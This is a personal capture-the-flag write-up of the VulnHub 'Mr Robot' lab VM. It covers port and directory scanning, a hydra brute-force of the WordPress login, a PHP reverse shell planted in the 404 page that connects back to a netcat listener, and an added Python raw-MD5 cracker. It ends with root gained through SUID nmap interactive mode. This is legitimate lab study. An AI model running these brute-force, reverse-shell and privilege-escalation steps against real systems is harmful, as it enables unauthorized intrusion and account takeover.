
vulnhub robot notes

I did the eJPT a while back and hadn't really looked at any practical security content since then, so I thought I'd spin up a VulnHub VM. I'm just going to outline the broad steps I took to completion, as this is more of a note-taking entry. I'll list at the end any major rabbit holes I went down.

This VM has three keys to find and is listed as beginner-intermediate. Mr Robot on VulnHub

After a quick scan of the internal subnet, I ran a port and OS scan against the discovered VM address and found the following:

PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  open   http
443/tcp open   https
MAC Address: 08:00:27:5D:81:9C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11

A quick view of the webpage shows an animated message, so to get a better look at what's hosted on the webserver I ran a quick dirb. There were a lot of directories discovered, so I'm truncating the list to what I think is most useful to look at next.

dirb http://10.10.100.50

http://10.10.100.50/robots.txt
http://10.10.100.50/wp-login
...

A quick look at robots.txt gave one of the three keys plus, more importantly, a .dic file which, when downloaded, contains a large dump of passwords. wp-login obviously shows this is a WordPress site. I tried a few random logins and, given the name of the VM, correctly guessed a username, elliot.

The next step was to try to brute-force the WordPress login using the guessed username elliot and the downloaded password dump fsocity.dic:

hydra -l elliot -P ~/Downloads/fsocity.dic 10.10.100.50 -F -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&testcookie=1:S=Location'

[80][http-post-form] host: 10.10.100.50   login: elliot   password: ER28-0652

So the next step was to try to get a reverse shell. I set a listener with sudo nc -lvp 6666 and added reverse shell code from https://github.com/pentestmonkey/php-reverse-shell to the site's WordPress 404 page; once that page was requested, the shell connected back to the listener:

admin01@kali-1:~$ sudo nc -lvp 6666
listening on [any] 6666 ...
10.10.100.50: inverse host lookup failed: Unknown host
connect to [10.10.100.51] from (UNKNOWN) [10.10.100.50] 44199
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 09:51:53 up 12:39,  0 users,  load average: 4.71, 4.97, 5.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
python -c 'import pty; pty.spawn("/bin/sh")'
$ whoami
daemon
$ hostname
linux

After a bit of looking around I found the second key; however, I don't have permission to read it. There is an MD5-hashed password listed alongside it, so I'm going to try running that through John the Ripper.

$ pwd           
/home/robot
$ ls  
key-2-of-3.txt
password.raw-md5
$ cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
$ ls -al
total 16
drwxr-xr-x 2 root  root  4096 Nov 13  2015 .
drwxr-xr-x 3 root  root  4096 Nov 13  2015 ..
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5
$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

I copied the string to my VM and ran the following:

sudo john --format=raw-md5 ./robot-pass.txt

With John the Ripper running (see notes below), I tried a few online MD5 lookup sites and one, https://md5.web-max.ca, came up with a match.
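As an added example (not part of the original notes, and not how John or the lookup site work internally), here is the same raw-MD5 crack done in Python. It parses the user:hash file, deduplicates a wordlist, optionally applies a few John-style mangling rules, and compares digests. The hash is the one from /home/robot/password.raw-md5 above; the wordlist is constructed here as a small stand-in for fsocity.dic, and the mangling rules are a hand-picked subset chosen for illustration, not John's actual rule set.

```python
"""Offline raw-MD5 wordlist cracker with a few John-style mangling rules.

Added example, not part of the original write-up. The hash below is the one
found in /home/robot/password.raw-md5 on the VM; the wordlist is a constructed
stand-in for fsocity.dic (the real file is not embedded here).
"""
import hashlib
from typing import Iterator

# Constructed sample wordlist, standing in for ~/Downloads/fsocity.dic.
# Real dumps are full of duplicates, so the cracker dedups before hashing.
SAMPLE_WORDLIST = """\
password
elliot
mrrobot
fsociety
abcdefghijklmnopqrstuvwxyz
password
Elliot
"""

# Same format as the file on the VM: user:hash, one per line.
ROBOT_HASHFILE = "robot:c3fcd3d76192e4007dfb496cca67e13b\n"


def parse_hashfile(text: str) -> dict:
    """Parse 'user:md5hex' lines into {user: hash}; skip blank or malformed lines."""
    targets = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        user, digest = line.strip().split(":", 1)
        digest = digest.lower()
        if len(digest) == 32 and all(c in "0123456789abcdef" for c in digest):
            targets[user] = digest
    return targets


def unique_words(text: str) -> Iterator[str]:
    """Yield non-empty candidates in first-seen order, without duplicates."""
    seen = set()
    for word in text.splitlines():
        word = word.rstrip("\r\n")
        if word and word not in seen:
            seen.add(word)
            yield word


def mangle(word: str) -> Iterator[str]:
    """A small, hand-picked subset of the kind of transformations john --rules applies."""
    yield word
    yield word.capitalize()
    yield word.upper()
    yield word[::-1]
    for suffix in ("1", "123", "!", "2015"):
        yield word + suffix


def crack_raw_md5(hashfile_text: str, wordlist_text: str, use_rules: bool = True) -> dict:
    """Return {user: plaintext} for every hash matched by a candidate.

    raw-md5 means MD5(password) with no salt, so each candidate is hashed once
    and looked up against every target at the same time.
    """
    targets = parse_hashfile(hashfile_text)
    wanted = {digest: user for user, digest in targets.items()}
    cracked = {}
    for word in unique_words(wordlist_text):
        candidates = mangle(word) if use_rules else (word,)
        for cand in candidates:
            digest = hashlib.md5(cand.encode()).hexdigest()
            user = wanted.get(digest)
            if user is not None and user not in cracked:
                cracked[user] = cand
            if len(cracked) == len(targets):
                return cracked  # nothing left to crack, stop early
    return cracked


if __name__ == "__main__":
    for user, plain in crack_raw_md5(ROBOT_HASHFILE, SAMPLE_WORDLIST).items():
        print(f"{user}: {plain}")
```

The sample list deliberately contains the lowercase alphabet: c3fcd3d76192e4007dfb496cca67e13b is MD5("abcdefghijklmnopqrstuvwxyz"), one of the RFC 1321 test vectors, which is exactly why it shows up instantly on lookup sites. Unsalted MD5 also means a single precomputed table serves every user, so any such file found on a host should be treated as already broken.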

A quick su to the robot account and I got the second key:

robot@linux:~$ whoami
robot
robot@linux:~$ pwd
/home/robot
robot@linux:~$ cat key-2-of-3.txt
822c73956184f694993bede3eb39f959

Checking for any interesting SUID or SGID executables, I saw that nmap was installed and had the SUID bit set with an owner of root (tut tut!)

$ find / -perm -u=s -type f 2>/dev/null
...
/usr/local/bin/nmap

I was able to run it in interactive mode and get the last key. This old nmap (3.81, as the banner shows) has an --interactive mode in which a ! prefix runs a shell command, and because the binary is SUID root those commands run as root:

$ nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !whoami
root
nmap> !ls /root
firstboot_done  key-3-of-3.txt
nmap> !cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

rabbit holes

  • I did try to brute-force SSH using the discovered username and the password dump, but got an immediate connection refused; it seems to be key-based authentication only.
  • John the Ripper with default settings didn't crack anything after many hours. I later tried it with the downloaded .dic password file and the --rules flag, and it did discover the password.
  • Before going down the SUID route I compiled multiple kernel exploits listed on exploit-db, as the kernel was running 3.13.0, but none of them ran successfully.